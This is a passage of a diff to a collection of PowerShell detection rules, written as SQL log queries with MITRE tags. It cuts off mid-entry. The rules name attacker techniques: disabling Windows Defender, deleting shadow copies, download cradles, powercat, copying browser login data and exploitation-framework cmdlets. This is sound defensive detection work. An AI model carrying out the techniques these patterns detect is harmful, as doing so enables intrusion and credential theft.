[ - "Legitimate PowerShell scripts" + "Legitimate admin script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Unblock-File %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Path 
%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%.CreationTime =%' ESCAPE '\\' OR ScriptBlockText LIKE '%.LastWriteTime =%' ESCAPE '\\' OR ScriptBlockText LIKE '%.LastAccessTime =%' ESCAPE '\\' OR ScriptBlockText LIKE '%[IO.File]::SetCreationTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%[IO.File]::SetLastAccessTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%[IO.File]::SetLastWriteTime%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_unblock_file.yml" + "filename": "posh_ps_timestomp.yml" }, { - "title": "Potential PowerShell Obfuscation Using Character Join", - "id": "e8314f79-564d-4f79-bc13-fbc0bf2660d8", + "title": "Windows Screen Capture with CopyFromScreen", + "id": "d4a11f63-2390-411c-9adf-d791fd152830", "status": "experimental", - "description": "Detects specific techniques often seen used inside of PowerShell scripts to obfscuate Alias creation", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation.\nScreen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1027", - "attack.t1059.001" + "attack.collection", + "attack.t1113" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%-Alias%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Value (-join(%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%.CopyFromScreen%' ESCAPE '\\')" ], 
- "filename": "posh_ps_susp_alias_obfscuation.yml" + "filename": "posh_ps_capture_screenshots.yml" }, { - "title": "Powershell Token Obfuscation - Powershell", - "id": "f3a98ce4-6164-4dd4-867c-4d83de7eca51", + "title": "Tamper Windows Defender - PSClassic", + "id": "ec19ebab-72dc-40e1-9728-4c0b805d722c", "status": "experimental", - "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", + "description": "Attempting to disable scheduled scanning and other parts of windows defender atp. Or set default actions to allow.", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1027.009" + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR ScriptBlockText REGEXP '\"(\\{\\d\\}){2,}\"\\s*-f' OR ScriptBlockText REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}') AND NOT (((ScriptBlockText LIKE '%it will return true or false instead%' ESCAPE '\\' OR ScriptBlockText LIKE '%The function also prevents `Get-ItemProperty` from failing%' ESCAPE '\\')) OR (Path LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND Path LIKE '%\\\\bin\\\\servicecontrol.ps1' ESCAPE '\\' AND ScriptBlockText LIKE '%`r`n%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '600' AND Channel = 'Windows PowerShell') AND ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND (HostApplication LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR HostApplication LIKE 
'%DisableIOAVProtection 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND HostApplication LIKE '%Allow%' ESCAPE '\\' AND (HostApplication LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (HostApplication LIKE '%ltdefac %' ESCAPE '\\' OR HostApplication LIKE '%mtdefac %' ESCAPE '\\' OR HostApplication LIKE '%htdefac %' ESCAPE '\\' OR HostApplication LIKE '%stdefac %' ESCAPE '\\'))))" ], - "filename": "posh_ps_token_obfuscation.yml" + "filename": "posh_pc_tamper_with_windows_defender.yml" }, { - "title": "Suspicious Export-PfxCertificate", - "id": "aa7a3fce-bef5-4311-9cc1-5f04bb8c308c", + "title": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand - PowerShell", + "id": "f65e22f9-819e-4f96-9c7b-498364ae7a25", "status": "test", - "description": "Detects Commandlet that is used to 
export certificates from the local certificate store and sometimes used by threat actors to steal private keys from compromised machines", - "author": "Florian Roth (Nextron Systems)", + "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1552.004" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ScriptBlockText LIKE '%Export-PfxCertificate%' ESCAPE '\\' AND NOT ((ScriptBlockText LIKE '%CmdletsToExport = @(%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Windows PowerShell' AND HostApplication LIKE '%Invoke-ATHRemoteFXvGPUDisablementCommand %' ESCAPE '\\' AND (HostApplication LIKE '%-ModuleName %' ESCAPE '\\' OR HostApplication LIKE '%-ModulePath %' ESCAPE '\\' OR HostApplication LIKE '%-ScriptBlock %' ESCAPE '\\' OR HostApplication LIKE '%-RemoteFXvGPUDisablementFilePath%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_export_pfxcertificate.yml" + "filename": "posh_pc_susp_athremotefxvgpudisablementcommand.yml" }, { - "title": "AADInternals PowerShell Cmdlets Execution - PsScript", - "id": "91e69562-2426-42ce-a647-711b8152ced6", - "status": "experimental", - "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. 
Which can be abused by threat actors to attack Azure AD or Office 365.", - "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", + "title": "Use Get-NetTCPConnection", + "id": "b366adb4-d63d-422d-8a2c-186463b5ded0", + "status": "test", + "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", + "author": "frack113", "tags": [ - "attack.execution", - "attack.reconnaissance", "attack.discovery", - "attack.credential_access", - "attack.impact" + "attack.t1049" ], "falsepositives": [ - "Legitimate use of the library for administrative activity" + "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Grant-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Join-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Open-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Read-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Register-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Restore-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Search-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Send-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-AADInt%' ESCAPE 
'\\' OR ScriptBlockText LIKE '%Update-AADInt%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%Get-NetTCPConnection%' ESCAPE '\\')" ], - "filename": "posh_ps_aadinternals_cmdlets_execution.yml" + "filename": "posh_pc_susp_get_nettcpconnection.yml" }, { - "title": "Access to Browser Login Data", - "id": "fc028194-969d-4122-8abe-0470d5b8f12f", + "title": "Remote PowerShell Session (PS Classic)", + "id": "60167e5c-84b2-4c95-a7ac-86281f27c445", "status": "test", - "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.\nWeb browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.\nWeb browsers typically store the credentials in an encrypted format within a credential store.\n", - "author": "frack113", + "description": "Detects remote PowerShell sessions", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.credential_access", - "attack.t1555.003" + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - "Unknown" + "Legitimate use remote PowerShell sessions" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Copy-Item%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Destination%' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Opera Software\\\\Opera Stable\\\\Login Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Mozilla\\\\Firefox\\\\Profiles%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Microsoft\\\\Edge\\\\User Data\\\\Default%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Login Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Login Data For 
Account%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostName = 'ServerRemoteHost' AND HostApplication LIKE '%wsmprovhost.exe%' ESCAPE '\\')" ], - "filename": "posh_ps_access_to_browser_login_data.yml" + "filename": "posh_pc_remote_powershell_session.yml" }, { - "title": "Potential Keylogger Activity", - "id": "965e2db9-eddb-4cf6-a986-7a967df651e4", - "status": "experimental", - "description": "Detects PowerShell scripts that contains reference to keystroke capturing functions", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Zip A Folder With PowerShell For Staging In Temp - PowerShell", + "id": "71ff406e-b633-4989-96ec-bc49d825a412", + "status": "test", + "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "author": "frack113", "tags": [ "attack.collection", - "attack.credential_access", - "attack.t1056.001" + "attack.t1074.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Windows PowerShell' AND HostApplication LIKE '%Compress-Archive %' ESCAPE '\\' AND HostApplication LIKE '% -Path %' ESCAPE '\\' AND HostApplication LIKE '% -DestinationPath %' ESCAPE '\\' AND HostApplication LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_keylogger_activity.yml" + "filename": "posh_pc_susp_zip_compress.yml" }, { - "title": "Execution via CL_Mutexverifiers.ps1", - "id": "39776c99-1c7b-4ba0-b5aa-641525eee1a4", - "status": "test", - "description": "Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module", - "author": "oscd.community, Natalia Shornikova", + "title": "PowerShell Downgrade 
Attack - PowerShell", + "id": "6331d09b-4785-4c13-980f-f96661356249", + "status": "experimental", + "description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0", + "author": "Florian Roth (Nextron Systems), Lee Holmes (idea), Harish Segar (improvements)", "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Mutexverifiers.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%runAfterCancelProcess%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '400' AND Channel = 'Windows PowerShell') AND EngineVersion LIKE '2.%' ESCAPE '\\' AND NOT (HostVersion LIKE '2.%' ESCAPE '\\'))" ], - "filename": "posh_ps_cl_mutexverifiers_lolscript.yml" + "filename": "posh_pc_downgrade_attack.yml" }, { - "title": "Windows Screen Capture with CopyFromScreen", - "id": "d4a11f63-2390-411c-9adf-d791fd152830", + "title": "Suspicious XOR Encoded PowerShell Command Line - PowerShell", + "id": "812837bb-b17f-45e9-8bd0-0ec35d2e3bd6", "status": "experimental", - "description": "Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation.\nScreen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations\n", - "author": "frack113", + "description": "Detects suspicious powershell process which includes bxor command, alternative obfuscation method to b64 encoded commands.", + "author": "Teymur Kheirkhabarov, Harish Segar (rule)", "tags": [ - "attack.collection", - "attack.t1113" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND 
Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%.CopyFromScreen%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostName = 'ConsoleHost' AND (HostApplication LIKE '%bxor%' ESCAPE '\\' OR HostApplication LIKE '%join%' ESCAPE '\\' OR HostApplication LIKE '%char%' ESCAPE '\\'))" ], - "filename": "posh_ps_capture_screenshots.yml" + "filename": "posh_pc_xor_commandline.yml" }, { - "title": "Import PowerShell Modules From Suspicious Directories", - "id": "21f9162c-5f5d-4b01-89a8-b705bd7d10ab", - "status": "experimental", - "description": "Detects powershell scripts that import modules from suspicious directories", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "PowerShell Called from an Executable Version Mismatch", + "id": "c70e019b-1479-4b65-b0cc-cd0c6093a599", + "status": "test", + "description": "Detects PowerShell called from an executable by the version mismatch method", + "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.execution", "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Import-Module \"$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module ''$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module $Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module \"$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module ''$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module $Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo \"$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo 
''$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo $Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo \"$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo ''$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo $Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND (EngineVersion LIKE '2.%' ESCAPE '\\' OR EngineVersion LIKE '4.%' ESCAPE '\\' OR EngineVersion LIKE '5.%' ESCAPE '\\') AND HostVersion LIKE '3.%' ESCAPE '\\')" ], - "filename": "posh_ps_import_module_susp_dirs.yml" + "filename": "posh_pc_exe_calling_ps.yml" }, { - "title": "Powershell Execute Batch Script", - "id": "b5522a23-82da-44e5-9c8b-e10ed8955f88", + "title": "Renamed Powershell Under Powershell Channel", + "id": "30a8cb77-8eb3-4cfb-8e79-ad457c5a4592", "status": "test", - "description": "Adversaries may abuse the Windows command shell for execution.\nThe Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems.\nThe Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands.\nBatch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops.\nCommon uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple system\n", - "author": "frack113", + "description": "Detects renamed powershell", + "author": "Harish Segar, frack113", "tags": [ "attack.execution", - "attack.t1059.003" + "attack.t1059.001" ], "falsepositives": [ - "Legitimate administration script" + "Unknown" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 
'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.cmd%' ESCAPE '\\' OR ScriptBlockText LIKE '%.bat%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '400' AND Channel = 'Windows PowerShell') AND HostName = 'ConsoleHost' AND NOT ((HostApplication LIKE 'powershell.exe%' ESCAPE '\\' OR HostApplication LIKE 'C:\\\\WINDOWS\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe%' ESCAPE '\\')))" ], - "filename": "posh_ps_susp_execute_batch_script.yml" + "filename": "posh_pc_renamed_powershell.yml" }, { - "title": "Powershell Add Name Resolution Policy Table Rule", - "id": "4368354e-1797-463c-bc39-a309effbe8d7", + "title": "Suspicious Non PowerShell WSMAN COM Provider", + "id": "df9a0e0e-fedb-4d6c-8668-d765dfc92aa7", "status": "test", - "description": "Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace.\nThis will bypass the default DNS server and uses a specified server for answering the query.\n", - "author": "Borna Talebi", + "description": "Detects suspicious use of the WSMAN provider without PowerShell.exe as the host application.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.impact", - "attack.t1565" + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-DnsClientNrptRule%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namesp%' ESCAPE '\\' AND ScriptBlockText LIKE '%-NameSe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Windows PowerShell' AND ProviderName = 'WSMan' AND NOT (HostApplication LIKE '%powershell%' ESCAPE '\\'))" ], - "filename": "posh_ps_add_dnsclient_rule.yml" + "filename": 
"posh_pc_wsman_com_provider_no_powershell.yml" }, { - "title": "Active Directory Group Enumeration With Get-AdGroup", - "id": "8c3a6607-b7dc-4f0d-a646-ef38c00b76ee", - "status": "experimental", - "description": "Detects usage of the \"Get-AdGroup\" cmdlet to enumerate Groups within Active Directory", + "title": "Delete Volume Shadow Copies Via WMI With PowerShell", + "id": "87df9ee1-5416-453a-8a08-e8d4a51e9ce1", + "status": "stable", + "description": "Shadow Copies deletion using operating systems utilities via PowerShell", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1069.002" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-AdGroup %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Filter%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%Get-WmiObject%' ESCAPE '\\' AND HostApplication LIKE '% Win32\\_Shadowcopy%' ESCAPE '\\' AND (HostApplication LIKE '%Delete()%' ESCAPE '\\' OR HostApplication LIKE '%Remove-WmiObject%' ESCAPE '\\'))" ], - "filename": "posh_ps_get_adgroup.yml" + "filename": "posh_pc_delete_volume_shadow_copies.yml" }, { - "title": "Service Registry Permissions Weakness Check", - "id": "95afc12e-3cbb-40c3-9340-84a032e596a3", + "title": "Netcat The Powershell Version", + "id": "c5b20776-639a-49bf-94c7-84f912b91c15", "status": "test", - "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at 
Service start.\nWindows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services\n", + "description": "Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1574.011" + "attack.command_and_control", + "attack.t1095" ], "falsepositives": [ - "Legitimate administrative script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%get-acl%' ESCAPE '\\' AND ScriptBlockText LIKE '%REGISTRY::HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND (HostApplication LIKE '%powercat %' ESCAPE '\\' OR HostApplication LIKE '%powercat.ps1%' ESCAPE '\\'))" ], - "filename": "posh_ps_get_acl_service.yml" + "filename": "posh_pc_powercat.yml" }, { - "title": "Use Remove-Item to Delete File", - "id": "b8af5f36-1361-4ebe-9e76-e36128d947bf", - "status": "test", - "description": "Powershell Remove-Item with -Path to delete a file or a folder with \"-Recurse\"", - "author": "frack113", + "title": "Nslookup PowerShell Download Cradle", + "id": "999bff6d-dc15-44c9-9f5c-e1051bfc86e1", + "status": "experimental", + "description": "Detects suspicious powershell download cradle using nslookup. 
This cradle uses nslookup to extract payloads from DNS records", + "author": "Sai Prashanth Pulisetti @pulisettis, Aishwarya Singam", "tags": [ - "attack.defense_evasion", - "attack.t1070.004" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Remove-Item%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Path %' ESCAPE '\\') AND NOT ((ScriptBlockText LIKE '%HKCU:\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%HKLM:\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%powershell%' ESCAPE '\\' AND HostApplication LIKE '%nslookup%' ESCAPE '\\' AND (HostApplication LIKE '%-q=txt%' ESCAPE '\\' OR HostApplication LIKE '%-querytype=txt%' ESCAPE '\\'))" ], - "filename": "posh_ps_remove_item_path.yml" + "filename": "posh_pc_abuse_nslookup_with_dns_records.yml" }, { - "title": "Active Directory Computers Enumeration with Get-AdComputer", - "id": "36bed6b2-e9a0-4fff-beeb-413a92b86138", + "title": "Suspicious PowerShell Download", + "id": "3236fcd0-b7e3-4433-b4f8-86ad61a9af2d", "status": "experimental", - "description": "Detects usage of the \"Get-AdComputer\" to enumerate Computers within Active Directory.", - "author": "frack113", + "description": "Detects suspicious PowerShell download command", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1018" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "PowerShell scripts that download content from the Internet" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE 
'%Get-AdComputer %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Filter%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%Net.WebClient%' ESCAPE '\\' AND (HostApplication LIKE '%.DownloadFile(%' ESCAPE '\\' OR HostApplication LIKE '%.DownloadString(%' ESCAPE '\\'))" ], - "filename": "posh_ps_get_adcomputer.yml" + "filename": "posh_pc_susp_download.yml" }, { - "title": "Malicious PowerShell Commandlets - ScriptBlock", - "id": "89819aa4-bbd6-46bc-88ec-c7f7fe30efa6", + "title": "Alternate PowerShell Hosts", + "id": "d7326048-328b-4d5e-98af-86e84b17c765", "status": "test", - "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", - "author": "Sean Metcalf, Florian Roth, Bartlomiej Czyz @bczyz1, oscd.community, Nasreddine Bencherchali, Tim Shelton, Mustafa Kaan Demir, Georg Lauenstein, Max Altgelt, Tobias Michalski, Austin Songer", + "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ "attack.execution", - "attack.discovery", - "attack.t1482", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1069.001", - "attack.t1069.002", - "attack.t1069", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Programs using PowerShell directly without invocation of a dedicated interpreter", + "MSP Detection Searcher", + "Citrix ConfigSync.ps1" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Add-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR ScriptBlockText 
